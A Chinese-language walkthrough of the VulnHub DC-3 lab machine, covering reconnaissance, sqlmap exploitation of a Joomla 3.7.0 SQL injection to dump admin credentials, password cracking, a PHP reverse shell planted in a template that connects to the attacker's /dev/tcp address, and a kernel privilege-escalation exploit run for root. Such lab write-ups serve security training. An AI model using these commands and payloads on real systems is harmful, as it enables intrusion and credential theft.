vulnhub靶场之DC-3渗透教程(Joomla CMS)

目录

0x01靶机概述     

0x02靶场环境搭建

 0x03主机发现

 0x04靶场渗透过程

​ 0x05靶机提权 

0x06渗透实验总结

0x01靶机概述     

靶机基本信息:

靶机下载链接 https://download.vulnhub.com/dc/DC-3-2.zip
作者 DCAU
发布日期 2020年4月25日
难度 中等

0x02靶场环境搭建

下载完成后,里面有一个ova的文件,直接导入到VirtualBox当中,如下图

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第1张图片

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第2张图片 vulnhub靶场之DC-3渗透教程(Joomla CMS)_第3张图片

 vulnhub靶场之DC-3渗透教程(Joomla CMS)_第4张图片

设置一下网卡模式,我这里用的是仅主机模式

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第5张图片

之后直接启动就可以了

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第6张图片

 0x03主机发现

arp-scan -l

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第7张图片

直接上nmap扫描

nmap-sV -T4 -n 192.168.56.107

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第8张图片

 经过nmap扫描发现靶机只开放一个80端口,直接访问,如下图

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第9张图片

 0x04靶场渗透过程

 直接上dirb扫描目录试试,如下图所示

dirb http://192.168.56.107/

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第10张图片

 扫描到一个administrator的登录页面,发现是一个Joomla的cms,那么我们可以用Joomla扫描器来扫描一下这cms

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第11张图片

joomscan -url http://192.168.56.107

如果没有的话直接apt-get install joomscan安装即可

 通过扫描得知Joomla的版本是3.7.0

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第12张图片

 我们可以在kali中搜索这个版本的exp,发现有一个注入的,直接查看试一试

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第13张图片

locate 42033.txt    #定位文件位置
cat /usr/share/exploitdb/exploits/php/webapps/42033.txt    #查看文件

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第14张图片

发现一串sqlmap语句,直接拿来跑一下

sqlmap -u "http://192.168.56.107/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]    #跑库

该命令的参数解释如下:

-u:设置待测试的 URL。

--risk:设置测试时的风险系数,范围为 0~3。

--level:设置测试时的等级,范围为 1~5。

--random-agent:随机伪装用户代理。

--dbs:发现数据库信息。

-p:设置 GET 或 POST 参数名称,这里设置参数名称为 list[fullordering]

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第15张图片

 跑出了一个可疑的joomladb库

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第16张图片

 那么直接下一步跑表

sqlmap -u "http://192.168.56.107/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

 vulnhub靶场之DC-3渗透教程(Joomla CMS)_第17张图片

 接着跑这个_users中的字段

sqlmap -u "http://192.168.56.107/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#_users' --columns

 vulnhub靶场之DC-3渗透教程(Joomla CMS)_第18张图片

 最后跑username和password字段信息

sqlmap -u "http://192.168.56.107/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T '#_users' -C username,password -dump

 跑出用户名admin,和一串加密的密码

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第19张图片

直接把密码复制到1.txt中,用john爆破得到密码:snoopy 

 vulnhub靶场之DC-3渗透教程(Joomla CMS)_第20张图片

 话不多说,直接登录网站

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第21张图片

登录进来之后就是cms的一些功能,我们可以找上传点上传反弹木马然后把shell反弹回kali

 vulnhub靶场之DC-3渗透教程(Joomla CMS)_第22张图片

 vulnhub靶场之DC-3渗透教程(Joomla CMS)_第23张图片

上传点找到,我们直接插入exec反弹shell

& /dev/tcp/192.168.56.105/1234 0>&1'"); ?>

这里的ip地址是我们kali的ip地址 

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第24张图片

kali里面设置监听

nc -lvnp 1234

 接着直接访问刚刚保存的路径,页面左上方也提示了路径所在

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第25张图片

 访问这个路径,http://192.168.56.107/templates/beez3/index.phpvulnhub靶场之DC-3渗透教程(Joomla CMS)_第26张图片

 kali就反弹回shell了

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第27张图片

 0x05靶机提权 

 老样子,直接uname -a查看以下系统内核版本

 然后使用kali的searchspolit查找Ubuntu 16.04的内核提权漏洞

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第28张图片

 cat查看这个39772.txt

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第29张图片

 发现文本末尾有一个39772exp的压缩包下载地址,但是这个链接现在失效了,于是我去网上找了蛮久找到了这个压缩包,我分享给大家把!

下载链接:

链接:https://pan.baidu.com/s/1SF4fN6qCiLYQYSSxnhq6hw 
提取码:2b5f 
--来自百度网盘超级会员V4的分享

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第30张图片

我们可以用python搭建一个暂时的http服务,然后靶机在wget下载这个压缩包

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第31张图片

 vulnhub靶场之DC-3渗透教程(Joomla CMS)_第32张图片

解压压缩包,在进入这个目录查看发现有两个压缩包

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第33张图片

 vulnhub靶场之DC-3渗透教程(Joomla CMS)_第34张图片

我们解压一下exploit.tar,得到一个ebpf_mapfd_doubleput_exploit目录,发现里面有几个文件

赋予文件可执行权限,再运行文件

  1. chmod +x compile.sh

  2. ./compile.sh

  3. ls

  4. chmod +x doubleput

  5. ./doubleput

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第35张图片

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第36张图片

然后等待程序运行完成之后,就提升为root权限了

最后查找flag文件

vulnhub靶场之DC-3渗透教程(Joomla CMS)_第37张图片

0x06渗透实验总结

1、这个靶场主要考了Joomla的cms框架,然后就是一个外部的提权文件来进行提权

2、因此还是得要多熟悉一下常用的cms,说实话,这个上传点还找了蛮久的哈哈哈

3、希望有不足之处,欢迎各位师傅点评一下!

你可能感兴趣的:(网络安全,笔记,php,web安全,网络安全)